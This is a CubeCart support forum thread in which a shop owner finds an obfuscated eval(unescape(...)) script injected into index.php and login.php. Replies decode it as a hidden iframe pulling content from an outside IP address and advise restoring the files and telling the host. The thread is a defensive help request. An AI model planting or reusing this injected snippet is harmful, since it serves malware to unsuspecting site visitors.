Jump to content

Hijacking?


djf
 Share

Recommended Posts

Can anyone help me please, I know virtually nothing about php.

Recently I have been under attack from an unscrupulous competitor and started to wonder if my files have been altered.

I checked and in fact 3 files have been altered recently that I would never touch as I have no clue what I would need to change in them. They are index.php in the root folder and /Admin/index.php and login.php. I downloaded them and compared them to the originals and there is an extra line at the end of them. I don't know if these files get altered in the normal course of events or not.

This is the line that is different, it's the very last one and this script line has been added:

<?php include("includes/footer.inc.php"); ?><script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%37%39%64%38%33%36%62%30%30%32%35%66%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%31%31%36%2e%35%30%2e%31%35%2e%32%35%2f%73%74%61%74%73%2f%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%34%32%32%31%37%29%2b%27%32%37%5c%27%20%77%69%64%74%68%3d%31%36%33%20%68%65%69%67%68%74%3d%32%35%39%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

Perhaps I'm being paranoid but if anyone could let me know if this is a hijacking or not I would appreciate it.

Thanks in advance.

David

Link to comment
Share on other sites

Yes the script bit is worrying. Have you applied any mods? if not, upload all the core PHP files overwriting, with the exception of the includes/global.inc.php file. Take a backup first ;) and make sure the files are from the same version of CubeCart.

Speak to your hosting company, if your site has been affected, it's likely the culpret has got into the server another route. The hosting company needs to know.

Link to comment
Share on other sites

That code inserts the following JavaScript into your site:

window.status='Done';

document.write('<iframe name=79d836b0025f src=\'http://116.50.15.25/stats/?'+Math.round(Math.random()*42217)+'27\' width=163 height=259 style=\'display: none\'></iframe>');

Do you have an old version of Wordpress on your hosting account? Through a Google search, this hack is common amongst older versions of wordpress. Regardless, this is malicious code and you will need to get your hosting provider to look into this. It's very likely that malicious code has been inserted into multiple files (inc. server configuration files).

My suggestion would be to shut down your store while this is being fixed. If Google crawls your site and determines that your site is infected with this code, your domain may be marked as "malware".

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

×
×
  • Create New...